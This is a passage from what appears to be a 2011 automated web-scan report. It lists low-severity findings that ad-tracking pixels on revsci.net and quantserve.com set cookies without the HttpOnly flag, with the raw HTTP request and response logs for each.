udm_0=MLvv9S8pLipr557J8SLcZtVsmYkpAEXfo4IXeAwquSQJS8LV1VT8e1Zf6ZL0ipL7+Kv8z8r9D7fsUFw2wl//IozSp/8YSn4NoHt7l4lq67B2aoTPJY8n/+xt25rkTM9DypP80PyOiYjfBswa/pIttQtABtvQCQc7lE2X5pTLFZly4Ho5X9JogRIv1r4DXxDUgTm31I6TxvuOcKmC/jYW5QMM3ruvTFdWWnnYKoLzU3RqHt1B+4whuE8KiYvSu8fekjRlh6End7IYoakFzgGNwXmFrORt0i1PnlcgwYHAVmdPZXPwfj5PC8fpo6ePf9KPHjtwKnWToMgc1VOatjJzghlFb3uJy+CLp/aBgvIyCGSTh51tY1Rvo4CkU9g/q/BgAxiXtL0sZoKDGnOR57czbWPW2snLVyHjK8qHn9sPGC4471fRIsWCpDXisem0f73E/ZYqkXVnZ4eygMLCHxTcBqIFjqQ0lsGEWtcVVk6WNz4l/Mewn91yb5z3TrGC94Ds0PI7lNEQ/zX+w65QliR9XUWQCR8ZJ0KoPYLJ9vKECY7qypI6JWsG/I/UnSODO2U2xhEoKpLlUINw4H3LIXL7g6gXRfai+Kt4E8gxorg1GKtpOngk4XZcT/94VjxqfHAdrOWtgThQIScl4PM9S4OeVp/AqIwVnD6+9/f77+K5aAauldE+R8qVL3mLN9jE87ZIwkWFl/denYCiK7nCJMMh1mWgtylCdkQLhvem5lL4df6OLCQDdqc2pKs/GXndlZ3eSYBP0hxu1BnT5DxxhgDCxWfzaPkEL58Qj+an9Z2aEd3idnm9kJYYUNJXJ7k1eWZB8XIaWBu+Og4PPbxN05GLrobjeAUr3OiEIqdhdgihq0P409GFU13gTUwlVlsfcu1/EYFLl0DER7k8wuY7faIt3xwOz+kc7xzOK8j7xSKy7XkKoBrIez+xK8rK00qfWaMiid3qLFhWrV7Z0YRVD5Tck40LehukJyUqz+nbRS+1uvi7svDbyhjMyqPcCeWYkKKYfULldUIH1bm8Pcz4+/tvOMe7uidWEFgdWhJeXvxXPLSHRZrYtO9j8Cnaw+R2Jc/MYSEsxo3ftJNSE1AGqd9z1IsgiJ9z5QHadxQxwsqAEgg6YrnJl7ALbsXv8caoArA7zp4fZgZtJCtxWzgclo/7zoUxCFNN/D3OGdAuyZRM4XrAxVRNGqCYmJ96huN4wxe1DAwK7D5sZ6NhmnsBvsQtpyPchz5bXwM1e1FZ05RNiXv3wbRaF4aMDm+j2wVHWV6B43cndwQ8fv7QzGvQMJpqcAx4rw==; NETSEGS_H10972=bff01c00ddc153c5&H10972&0&4de961a8&0&&4dc36aa3&271d956a153787d6fee9112e9c6a9326; rsi_segs_1000000=pUPFJEOheXIQVvUb5Bw3nLcSe/rWsx3DUgOajZMjUvBNkraeXO/p2pP6LNDeNFSZwK4/3mCVJfviaRT79+dgBdRLEO5ZoN0OAiVEuPKIPy7KVrvvoekFAdus9/RVdaNTr8DRZWq8v5lgFy81IhCEz3GO6SfeEvGPB/ePW28Rje+UaUKTzAr3aqJAP7vkZoWH+PGgzZ7+DLapvhC1VjPlIuK+MbylPCFjhhhHNirmG+ViZWCfBUFZgh51jhqhMcxwA/tm9SHxHcKF/BYQzcy8eKnGKEj3/Mh2NPlCCzwTqDEgda1QFj88u3iYrYO0eQBlIq7ADEX3BTzYP/cCovKnKloJZsmdbrpz9YbcuPcmVUr8F61tvh1YpLb/jdAvR9EW8XtYLwFVc10vhq+rF3CMgpL33pey1aj17claX2TjQCvjtLSS6T5pVMNGhxLcTLmSk5sRkhBJgO9umpeIc9z3LW0Qtg+TFeOqQBp7h3WC1bNyjT0tsIA6QUFJ37bFfcIDlNqUSGAqpmIoClwjtQ==; rtc_cer_=MLsXtzE1JhpnJ5HL3vzIqKPpyVrMNHGJvojUnXJXjAPTw+wWY7y45WrIsWOW0pLnHqged2X1aG4UUDn9Sek+jWM8P1olTSqSNdTxgq4nDCLC46xOmx6IxR0G+VNWGQbABRvHHzaaDDvP1ShHKDO+zvcRVLpuVzsu6kJRzFShOfPi4AZtXaq9wwNOY4bZJbpnQFEN2TQ7KRTJ8rBfM+g/kHYUL2Ae3wgujF11mbMMKQr89J+G+C/NiNon7QlzTW4lUrhT/X7stCdA9BMHH1OB6MF6HbWJ0cQ/0X2jT5wzlPvyjJSkUy36zEuwbe6aAJz48vioAYl7/RCc8hUm2CzJ74HAeaLJSxsFldBvKpKMSD4SvvbwRrNW97jjItImf/7r6+YNiPrIEahdhi8irCZzdYxsUhb6S2TvV9GnAQLVKE0b3HUva+XdBygoiSki7pU4xDIBmEPWSoq0KjkP9KA7LSna0eWtDw/RSSai0UKKqd0S9fhoVNvjUacZpD2D5le29IRTFAGcXd8G0ZDkDmuaoQbCCh71MD89MUyUx5FeHFOVPe6aSt8MI4EScP0nWyrHPghHPhppBbiTYOC1ht8uwbe2RddumDuzthrhuL2keoEygiyjtrguUx5lbg/95Hr5CN+XzqzjCG22CIaYIj1pHLeEkU/mQUSrL8mDB5n0OqlwMO4EF/zX4I6qKLZjjqsBoX78SrQgsDgLMt+h/t5BdC0Wa4hBjdkmG9BsnkNjuVOaRewamFoSlheDogIfDzIeET/8ep1AmSBCpjjvQHnOm/XdraatD89cjXmQxB0k03vOAWKL8pdJiGnYCWrQxdCk5b/NEC+imR9+1fiEPafYzCOFPbCRYsYlbzC1jdG9EFg6iOyrgrMYyT0+1bHZVSDVIxwDoTibsji3sVzNQzfkIJo1LEF1z7701aurKcGIIyYgVxrloABacahXq/Ckw8NcwvJGclRMzEmcIJ5KsxUFR4zynbONfhk//QMFIs0f948ePudxN1zPw6UVAdDYqpRYvHQo0EjST1TVhNaCBRjEbPPjwYbD1H8rGLmFC8+5rCsDt5DAFMr11/jsEWaaeh5jmD4IZLV7HnYac97sKKMm87usSK+qwCZvqO8FAq6SMLqOQp4pdu3qjzzZfxkmj1yYZK5rX3ueSZ5im7eKEAR2ivqUf14W3a+jPcNN7jn+lBDenCKYTsI2UHmKPjjYM9ItpZgr23PwZo0Qj+w6Qxr2+SLbNSRfEhyPDlStkVOaXRL82ELXFpkI292WNIWl/kw/UGrbcwSnHVycDL1LqO6SAxM1XA7+Bfm3qlit3MWvkBFO4YvTZ7jPKnzvQpsNRrtynBzQXJ3EULenVbdm1Z2XNYEQSpejpAgfvjN0W3SO9NW64LUXVscn4+mQHvT6iwuWe+bEsn4u2ZYI807tt2pRK+61OI952t5g+PbC01/Z3uVyvF8deFb9TNvHwOMA6AwViI10J+5DtA==; NETSEGS_K05539=bff01c00ddc153c5&K05539&0&4de961b8&1&10592&4dc358e3&271d956a153787d6fee9112e9c6a9326

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rtc_cer_=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUP15EOheQIMp6b81kYFwpyB7qEdw7duSjkNTahpEt86nzU5ngw7cTFl7XVNzj9gP1CimrFlL4I0pMbllsZSDDizv11Yd4W9jzyyi4YqtNPFNTnpxPohouutFRxl+63IU2Hqy71trPYPR9Zo4aPnsPUWRQfFtTe3u8hMKPQ4Jc6t37oC7abCUfEsDg5F7Vmzy5irDuGQ/HuwzYAX78HWEoPSjOa1b2fEkOddDegqkcWnYPDxwWxphx/JehZ0Pioxa3Tx7VOsG0z0XYHfcpcQY5ye2VaBmYiGib4m85UczXLzccHnCcd3GYfIjua8XrcLzVYD0bPpBTwqmG2t4z6nZjn0yf5WR4e2ehEtJgTj7H985kmKXktoMBTBNbIskN0905VOTN5R4THwyBJ75VDIW9ZhWBIe3bYmqZkp24mQJLdrQYjFXEmhp8bzNA+b+ZmygmhrgBIY28g9wUTwOzbAhpq0/DiL6+jAJfwuBSa25nR/ak/++FGbESaBrwuiZ6yc7XTPOg==; Domain=.revsci.net; Expires=Sun, 06-May-2012 11:25:03 GMT; Path=/
Set-Cookie: NETSEGS_J05531=bff01c00ddc153c5&J05531&0&4dea160f&0&&4dc4b40e&271d956a153787d6fee9112e9c6a9326; Domain=.revsci.net; Expires=Sat, 04-Jun-2011 11:25:03 GMT; Path=/
Set-Cookie: rtc_ILqw=MLsXtzE1ZxpnJ5GrHvmWF/KWrPo31Agpb5slCPedGNAwVTi74gkGz+Ioj4EWp+/DHqged2X1aG4UUDn9Sek+jWM8PzolTSqS7RsUjlJjpOBJV4OQhg8QGT4qzmd32wLpi/idGBjih+awrUoKWaJ0K1B1Lomb0QkvRD26c4T9RWug2cO4FjzKAUk/0qUcoDTyVussQkDgGXRawu/DgYy8AQYowPQYovmciLKxDbxy63oR0tY9ui/NiCYn/cnzTG4mUrhXRSpVst8UQQg9UDg0tgeixM8uBejqsKnVnMHc9P9FTM7x/ggwgrQzGUjVo6BefFXgFaQMIq+AXZcR/zpqBBsaLusDfUMdaCoeRbtAAVUE2mPvTEZu/93IB+zgKsSSVbDbVKROB1dqyeuXojAa7aHmb6eu+5ZmujQ0hRHn3xtEalcmuMeIg3WRnEijYtYALyQhp73E6VAmilQtoTPiNnBpnYBOsQoPgwgptLgSn07OG+jh5lrW7RTgIKy6MXkkmkQhCWZXO5mYNKzaRPm5xTNWXdC2579VbAg5n3aFD4xHuBpLc1V4ElYMePMZdeAdlgtT0E6Bx+Nlet6sPh5w2kN9EGCAsoXpjef+SbJ6yj1XtqK/Ti4AW2t0WrjxZ+ZdhqeYyX2/xogbUb/mgHumrix8fG9wK1NOIuNbpYW55sLR+aqooY9f7I2Zb0/Y4FhxjSKXWeh8Wap9wk65kZYLh9kAq0vrvz5Qi9Q/ZEgsrAd+fuTGh+Rs0UYPCj/jKhV2sOX+dhl0rauwPPPDupVHqmA11y8OaIDcpDa40Ec+aQmnD1Fg27ft7srSL4do5uyHD6m6pzT5gt/lh1IEBu7j624K+xXaxFrGmoe9um+HHVewxEiqK1yBPju68o7c4sEE6uv1R7tqhcphC80uE6bJsLcvZGgmVNLQoRmZu+19T6S/xFwIm0CESwJweNmTY93I8wQWuSkfvZPw3CXLkLuMOgDCuaebRsxiEO6Ve6CksLxbQx9Y5wo/Y6ljLXS6W8TuXPg8Ajn5DU+Gi7u6DUWdBc3GEgPZ4yACxIzv1Ht2Sa9lB0jhrHo/7Az8dBX7jueoWaMLanZ233NKdMdp+CJe8rutyK9A4GiO/JUhmI9K6dIDyOLSc4CAUt8mYfqlj3OYYg5jHXX8T05v6nQrJDyj95cvG4Z4jCeVWfvZ67L9q8UCKCd8w/lnvZvmyZKJJHPmUsWaIp/R8cDID5iXMFfc7AjdPWSXxeIYwJg9CwbkPsH6kXw8r0Oqf+XkEFay3UyruKRLC/1ue7DUS06B9fKLJFdj1f9LkA1cTpsnTLax8shJVlffoxUmGUzIDD92ECFG+DvSakohNl+OCiyZe+o3RcTToFAQ07UwbeMPaqA3lvSgwmqNpCpclQXSYtB1HznkXyZTA53rtFtSU+gRUvyL7AbO5Nev/zyDtnqcR5ujoU8PPUHYK7LfI3Ikvsuf5Q1AXNSohTIoIOj09vCTD62+I86CBu6sVVo=; Domain=.revsci.net; Expires=Sun, 06-May-2012 11:25:03 GMT; Path=/
X-Proc-ms: 3
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: image/gif
Content-Length: 43
Date: Sat, 07 May 2011 11:25:03 GMT

GIF89a.............!.......,...........D..;
18.139. http://pix04.revsci.net/H07710/b3/0/3/noscript.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /H07710/b3/0/3/noscript.gif

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /H07710/b3/0/3/noscript.gif?D=DM_EVT%3DCSM_Expedia_LP HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=2588783;type=nausc547;cat=naush134;u=9b6b0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=8e1e1163986432e20f9603df067356d2; NETSEGS_H10972=bff01c00ddc153c5&H10972&0&4ddd50a2&0&&4db7974a&271d956a153787d6fee9112e9c6a9326; NETSEGS_J05531=bff01c00ddc153c5&J05531&0&4de2d7db&0&&4dbcd64a&271d956a153787d6fee9112e9c6a9326; NETSEGS_G08769=bff01c00ddc153c5&G08769&0&4de391c0&0&&4dbe39cf&271d956a153787d6fee9112e9c6a9326; NETSEGS_E05516=bff01c00ddc153c5&E05516&0&4de3922b&0&&4dbcdaf4&271d956a153787d6fee9112e9c6a9326; rsiPus_cUAg="MLsXrtEupC5v4JDWbm5SF4iCa9rxq92nU/WOr6kAXZYdLpPAQvnyqW118N7oMEOiC2a+Qitt1jCSQnt7wOLuFf/9TQPsfq6IyG5KAtGyxR3fC69ZIS1PEfZ7+RJPbmgi5/Do4ttQz08XO1UZi7xW2INSPBRMu/rnPp04+54Ys4dei76PNAqSipahtYUfnrULkB+5OvuWzwKUC5dvku8yoxjK9eqMv+qsudi6yDI5p7sjklqfA/Df4499H+aU47uX/ZStvm7s0bSjla+AwzWAysWR5lO0C6CV3XcHBk4XAJoLy17PEAhkXQrA5UZbouz0UH099/lxSt54s7u/1vi/Ooc6ZsdHYnkAmIE7OjXRhH5swOnx+Qe7TQNTY5avAup317qWXxpxHGJHaYXIBQgZDvVvP1/FdYHpe4ELzEm01fLjZ3NRUu3RLcxJe/LWkVmHz79Zn9KKPtd8TZxCCYd1SF0BsJd/w4RxAXd8u6LUBqIMTYJLRCFBZYAqfyg3pMk+tHsbPBAY+t4e0y5XfrgZeOS5LS0raNTRDvmgWWyrK/P3YcYuQx+1XxK1YTDnTUoMKeILlN/WyNsBDbEYkH1exWL76rR83Bi3+v2FqFxztf6n5/2gdRHjcEt9bVnJ4z3dKF3kglsKfCM6oHY8rFN7qcjUzF9dx5DdQ3yk9RA="; rsi_us_1000000="pUMdIz9HMAYU1O2uQ7bkS/GtHFajpUjRHJppcTQ/E+fDv3TBS3u3eKtw/qV68iFxwFHQSUXJh/TEDlqK5ymryWN1lLpjgHRFDSYttD59YZFrXOXgP3z1GpnIeFgtFDR1F1h1DvPJ6jGxiMDbAnxQhvYqAwMe3iYLqU5GS2b8LfrTbx7uRJOZcXZTF1nqAhc9j1XANGppgAkqLrW5J/DkaoiGFOnArblFlMxnIUs81A34N/6VKULJ5NXcgY4g9jLOtCz0A2zRfBV0tB6nig79jyxsPK/BtufPnOuytnDMGwwiEdVEfx6xS+gdhVS/YoP8gws4gSC0AJdMoSjsujh74M9+Fuy742S9LEO0odVcgP8nwKkbsPsv3MIMTgRwUByQS0+3PTu18ZNX15PFr3nkMs5yPDt2381kVtM3tUsb7UTaDxWlFawllYsd+K30dHBKmeOvEyOfWttKqC8T1WwfifCTg5OqGJEWYbTZJKrVqzIxoqCSdeInRhO8LVs1qCHv/xxr5klEDkmKfHvF3yACOKWqmWc99TGbMUwf1jXvnMacDDEIRle75AsgC1t0n9TOjQlEvQUGZUlrBNuwrAyA8WHgji5OTrwi6ZAOSH/kv/L1brD7LtY7KfEaHdjvNdTzvoBUQMG4UTO6tV8OPsAUbmXYKs6T9V0kUdHDxS5IPWKMbw64OOcJPQgyRxyqJsiuBp3dvkWmsDV+KduhariE+vHGWgkxjV3chDQ3HlznmZrWkDHUMxVsE5mlY8EEUQt0ADLtrW3uR1r4wH3z3ZIdpJAGNmiIVyRr2c2b7jtBhTZxAAlNf7l7f35RlM2r3iTLGaF16IS79K9XrMEkuBHsy/k9wS+yaRUPCDErkqNr9YH2bA5/m2lDsmX2vxXhzSVPIsZH46KEZTqbjaFkaMVUv/ITp08VtIAQ1Yvu8ZknO30xfvR4vAy1AWEvvRf2fTQTa86Cxadw7P5qlBPGbbc96CWkKYIaCHYlvv56SO55p0Bo3OSWyjxverGSQYL67FQcst0Y+Jf/kIY+hq/65Cw5pVhi+rOWA5T/otP69RNqpLBD3wut5wpUIOU3A3cz+Fww/cmAfldRXnDpjDHyOUTv16cufUECTFP4HtE7b0vSWonFxeUXUs0PotTR+7l6VjT1pd6km8G3O6Jy+CinadIyS1ZkYM7x6spOGE5UiyQvx8Zs2WjO/p+duPiDfcEZGtR+HUDufru+EUMxg4w6AcWPnyFQbFw5FZSvULDb31fy7NREGAnb8nazQEJ7uSv7XT8wDJIORNgj0zbeAPjKWAlyPP3oRqS3CgRk7KsmlGuzBtB/H49kpYMT"; NETSEGS_G07608=bff01c00ddc153c5&G07608&0&4de3df00&0&&4dbe409f&271d956a153787d6fee9112e9c6a9326; NETSEGS_B08725=bff01c00ddc153c5&B08725&0&4de3dfb9&0&&4dbd04bb&271d956a153787d6fee9112e9c6a9326; NETSEGS_F07607=bff01c00ddc153c5&F07607&0&4de3dffd&6&10124,10098,10078,10053,10100,10143&4dbe0e23&271d956a153787d6fee9112e9c6a9326; NETSEGS_K08784=bff01c00ddc153c5&K08784&0&4de3fb79&0&&4dbe5453&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05539=bff01c00ddc153c5&K05539&0&4de3fbf4&1&10592&4dbcb06d&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05540=bff01c00ddc153c5&K05540&0&4de595d8&10&10572,10573,10342,10343,10391,10395,10432,10537,10538,10166&4dbfac5c&271d956a153787d6fee9112e9c6a9326; rsi_segs_1000000=pUPF5EmBcXIQDrv8foMIxLwGjA3X27dOgaUluVNj9D506TXNtsL/yGow6EcUZB40BVxKu31EHezwrjztfPhfywGDnxOlPZh6OFobM/TJ/44BF3NGS7lkeUnkF3cOik+7vGWPnuMBy2aWvt8iTQxsOn1taZJdrR7gMIwDVr3u5ZG1BGnU1OEEyJobiVQxAfdIgY8NTDGQ9inwZmN6hYCBNWfttdeEB5dOfWGPO9lT3XjCU4wKvLp+pWmZ37Snoi3OQaH49LcYCduGsqPdjwJsxuFVmBKRFVneI0eWJ0CtUqnwQC5FNpEUESh/hAcaXN1ul74P/7JN1bKFfNPKJr8+Qi0bABaK1ks6X3TBL0H+mCMcQFy/cNknchZvrLkvREM43Ay9kS2roQGAv3hKPR/GkKs4E3oxTX885agAkWW1VV+YOmkbY6zG8TDQnbmOuBNKzgMK8Jf6B779+FmOch7bkeAbg/Nkx9gb29IyA/19J9hXx9V3XvSpoX027/hqY/YvCA6NnLh8w6TFdQ==; rtc_WcYd=MLsXtzE1JhpnJ5HL3vy4noCEnCpKIFSIvojUnXJXjAPTw+wWY7y4JWrLsWOW0pLnHqged2X1aG4UUDn9Sek+jWM8P1olTartZdTxgq4brSjtMRLmv63at5KmReuQqY5QDIJXFnjMUw1S6PRlodfSKqqb549UmkRkjTS4D7LGgrhCL3lL5sZRNA+0k1B3YjoeaeaOl3QWNZ2a7mA3OgkBUNPumfPRDwbrh//vRruydeGes5LgcdE1mHzNbyGKVucdIsKbpRfqsrunYbeWzxOrvYl+JoYbGAl5hFOkyqe/Ll6/+N11WueF4sV7DgZCPfDYYbacKsM9DRFLsZtmLc+0rYcryVOomm7rJiwG4w26IrIRlkjgSGRZAiWRwQU9wIg1FIEZhJmvWaMHPl8dCwW/tj9Ps2XzN2EmkeA62/n1vdDz1ecGFVDJtnJyhQc2mLlrsS4li8KDipPiD0S3WzWXXQzN9igS8uFhhnxf2qqZVs20Blh7sbphtzyddDrjO5Jnc9bvqtayg9y/jXxGwcHr7hfMfCdMtli6EJLspKye7WsZz1GCdxuwBOO31Qpxlw8Y17stUYR0v0Hqq02A58AayAhLJBVnnxcH+Jqi2+3mWnYNm+3ywiXLxtdbQ75QX0RrcTWSmggv8B6eFRmOZYMUrVkwZiFtUB1nGGJZH3iwDWK3ln3rmyWUSJYaWVs+G3/KfBTBH3q3otOcVRlKrpiVd4OKl7D3o6o6HKBUO3wTOMZ8QkCta8DrRLJyw1g6WZG5tL/CesBKfPj1fOaT2TmAqkShqRa4aVuVJ+/p+aADjwtQ2/sVt+lYlYONpoeA6ewHD7G6ojL5gt4ljNIEBu7naRBKd6pbNVjGWrq9+q+GbeONKjg1NYXQR+zBkuqE3sdUFe7v2pXPavI8sooFafMIX7bfS/4glvvxSPQYjGmeQUIlGv6ycJlA+lhens349f2FzSDPsdZpiayxm0eCynxOP1PfR4ZkeqU+m9yD30+QiCwIkQuOuisaWndLK6pbIeUg2OrfdzBTs1APAA05GGjeLMPl6jc1jwIfaeAHqN7a/sSmy5jwHya3KYtMlmydCdA4FjOMTNFm/HVKd1dgCSb2c5fsYMhc9nE9TJFq+FEp13f7mm2KArOCk/OB7aS9k2HQXoIckXFQXtbtTMhVz2KejL4/FFQ7XAReGk+GdP+mn3ciXr7rjqWTyoYP+ZIlkjuBUI8dd/NU1bPYkcO3+/ZvOvmJnz6BKLf83Dmj6668cLLwC4yklr47tG4CCDGYGLMg/pzlhdDHouFcWKWxGi3RhS3LWSYMjSK2wNK24oAHuoR2EvMIFn3vi5cAmSvoEeQwxD29VVdpnB2IW6lbK50Ucm8o/g4QL1JYTd1hkwojD0PZvNBRTxbxP1832LgaQbffnd88uLkbFvQZPJBY/7Js23zW2Tb+79fSEO/e5DSjKAJf101JlAmCyTjoTzeb32SdjGmQ; NETSEGS_H07710=bff01c00ddc153c5&H07710&0&4de96140&0&&4dc3b759&271d956a153787d6fee9112e9c6a9326; udm_0=MLvv9S8pLipr557J8SLcZtVsmYkpAEXfo4IXeAwquSQJS8LV1VT8e1Zf6ZL0ipL7+Kv8z8r9D7fsUFw2wl//IozSp/8YSn4NoHt7l4lq67B2aoTPJY8n/+xt25rkTM9DypP80PyOiYjfBswa/pIttQtABtvQCQc7lE2X5pTLFZly4Ho5X9JogRIv1r4DXxDUgTm31I6TxvuOcKmC/jYW5QMM3ruvTFdWWnnYKoLzU3RqHt1B+4whuE8KiYvSu8fekjRlh6End7IYoakFzgGNwXmFrORt0i1PnlcgwYHAVmdPZXPwfj5PC8fpo6ePf9KPHjtwKnWToMgc1VOatjJzghlFb3uJy+CLp/aBgvIyCGSTh51tY1Rvo4CkU9g/q/BgAxiXtL0sZoKDGnOR57czbWPW2snLVyHjK8qHn9sPGC4471fRIsWCpDXisem0f73E/ZYqkXVnZ4eygMLCHxTcBqIFjqQ0lsGEWtcVVk6WNz4l/Mewn91yb5z3TrGC94Ds0PI7lNEQ/zX+w65QliR9XUWQCR8ZJ0KoPYLJ9vKECY7qypI6JWsG/I/UnSODO2U2xhEoKpLlUINw4H3LIXL7g6gXRfai+Kt4E8gxorg1GKtpOngk4XZcT/94VjxqfHAdrOWtgThQIScl4PM9S4OeVp/AqIwVnD6+9/f77+K5aAauldE+R8qVL3mLN9jE87ZIwkWFl/denYCiK7nCJMMh1mWgtylCdkQLhvem5lL4df6OLCQDdqc2pKs/GXndlZ3eSYBP0hxu1BnT5DxxhgDCxWfzaPkEL58Qj+an9Z2aEd3idnm9kJYYUNJXJ7k1eWZB8XIaWBu+Og4PPbxN05GLrobjeAUr3OiEIqdhdgihq0P409GFU13gTUwlVlsfcu1/EYFLl0DER7k8wuY7faIt3xwOz+kc7xzOK8j7xSKy7XkKoBrIez+xK8rK00qfWaMiid3qLFhWrV7Z0YRVD5Tck40LehukJyUqz+nbRS+1uvi7svDbyhjMyqPcCeWYkKKYfULldUIH1bm8Pcz4+/tvOMe7uidWEFgdWhJeXvxXPLSHRZrYtO9j8Cnaw+R2Jc/MYSEsxo3ftJNSE1AGqd9z1IsgiJ9z5QHadxQxwsqAEgg6YrnJl7ALbsXv8caoArA7zp4fZgZtJCtxWzgclo/7zoUxCFNN/D3OGdAuyZRM4XrAxVRNGqCYmJ96huN4wxe1DAwK7D5sZ6NhmnsBvsQtpyPchz5bXwM1e1FZ05RNiXv3wbRaF4aMDm+j2wVHWV6B43cndwQ8fv7QzGvQMJpqcAx4rw==

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rtc_WcYd=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUP15EOBcHIQDruItIkIwgjhpoCTQaTKiADcRKhp6L+d8ae0BpWezGpQqMxb5Phhf8mSWMe2tYJkR83B4NeQC4d/o4Fl+E72rCm7A7YBO6ftfvrPJfiYJ+ShCzwF/amIXGbRUoRnqXOW3lUEf9oWp00D4ufEdDS3O8iku4/dxQUSWMjjmY7WPDe882v/8LA8rQQ5zpZF91tsrjsfWXOQUGPFMyHOg4E7BTNelfbxFM1CMBzLynlkdI5n9LWQtRIw5I3lYqhxPZaFV0VL8e2E6B+uMXsKYGVXpLZ2TM9tok1UZLWoJEmHw6QYo3TS25txI8/j94tKvl2UJU6El+Fs3kQv+ZUtfXV1goUmFLKDzLTzRYe0T9FTr9aeuc+C9CG/daR/1O7H5uWKCpQqsxpik+9/OkvzMbVGZVb2T/Md/KcMIwRDJIn+VjuZYTl6zXeuUmyyQWtajfizPy489T2pqXM4zZy6UEZCvGosm2wbYsBPa1wKIjcZg2fhTVqaE7UtNVake9g=; Domain=.revsci.net; Expires=Sat, 05-May-2012 22:35:21 GMT; Path=/
Set-Cookie: NETSEGS_H10972=bff01c00ddc153c5&H10972&0&4de961a9&0&&4dc36aa3&271d956a153787d6fee9112e9c6a9326; Domain=.revsci.net; Expires=Fri, 03-Jun-2011 22:35:21 GMT; Path=/
Set-Cookie: rtc_hdKs=MLsXtzE1ZxpnJ5GrHvmWF/CWgLZrYKUib5slCPedGNAwVTi74gkGr2Ipj4EWp+/DHqged2X1aG4UUDn9Sek+jWM8P1olTaq7ej6Dk/7O6T/gImgqfhS/fa8kwEqZhMLA7rr5dbctvj4KRqaT3jlzVpIPTLPOZlpRsFQnGcNcik0Vr/9ChiL9/dR+6TNbTGzp54iTMx9i7IA/M6syQEezQPwO4YUSLj2DbGhi/4Jolbl+6ZOTVx+W8cslzKfYsFHmuoyeGBwbsd1bTAxTphe1k40xYV92B45jmgrgB6/H89z6SRhp1GeG4kWKDw5CPfa7A/4WQDYPDQFTsZ2ttxQJ/rnIA9pRw4LfgHHRwLlNBUloulnJRNF8kdhJjEPkWfTqi1zPbesQx1fqJXeZJtyPKOqtZNI9V035IwXrvoyuFZQdQAXadNNCH9RWSxqd6nTdSu5kXKxz8xb0tYwx0LYb5txuGgmTHdyh5ie9d7thoIb/MJtZeGMLDzEOb5TkibpUjhNrG7OFF96RGpt6tIJUFbcNraCnAT46IQyNapge/OP42wmo1ckMPxlqP05nnC68WzHeGJh9k5C3WXvZpirNOd0DPxV/g/fG+5qiuL2keoExgq6g1lguUz59bg/95Hp9C9+xAs+noKPRebSc49l4l4C4tq2+eeO8HyiVB+lgSAXFESqLDcwX9oqqKLYjjqsBoHx8SrQgsDgIMV+i/N5Bdi0Ua4hBlSKh17HuEasBYtI+CzD01Uhdk/bZkXxOO/SdEn9af62gKRR4Ah33CN7MTu3l/iOkdKeYI3szmc9Yd9ozmo1pzFdrQQkKyZJeSXqZpO3p+s5n8djXqBRpmUB8YZR0VKraNlnG2tQkzx//zv339tnJCBbXR+pBEmq8L5la7a/4YaD4szeS8uTzJX0qOIEuU+AA0J3FaCkrKjdYFIAaylldJlPjIy/Q8MgnXvF7B6CosPAzzo/+2DM5jv2yh0LM3jnGkQO/A2SXqahqoAG37uql4CWsmFmZgE1furniCrruzAXaEy5s0AKznPjllNVwv1mofZOCc+h6kQCduxK+7RPxbgOHm4lLlkOV/cCKhs+1T6l+wECUFBllnwyRZ5h9E3S7JFv8gy00JNu++Qmff4WRDZCc439hxefv8hAm0PG+oWPh3uD9BFWY9mIYSZ9/3OkCQru9DqyUhOSSuBVAmpXh/c7tlYTxiToRXS8LcruHYtO+mKfZxxTs+llGpQ32PiOD6FseycwIpd2XeFPbLkYwnV45QMN+GQNS1DnslVWGvwSo+L7BVvVJjhq2qvVk0cVKwB43EcMRu9sBYvmdLvuZZUDzEVE54p2XApRprYWiMwkj6FIefpFbiHeNa6utEJv9elonE9IplVVQTbwaIxivxbxSWlJT4jFP84eoToKwJpylz5YY807t92pRWCsL0nbgNqb65Lf2Q5+0iFejG2kxa4Cu8dQrUJl27A+dH4x0UklDoA==; Domain=.revsci.net; Expires=Sat, 05-May-2012 22:35:21 GMT; Path=/
X-Proc-ms: 2
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: image/gif
Content-Length: 43
Date: Fri, 06 May 2011 22:35:21 GMT

GIF89a.............!.......,...........D..;
18.140. http://pixel.quantserve.com/pixel  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.quantserve.com
Path:   /pixel

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

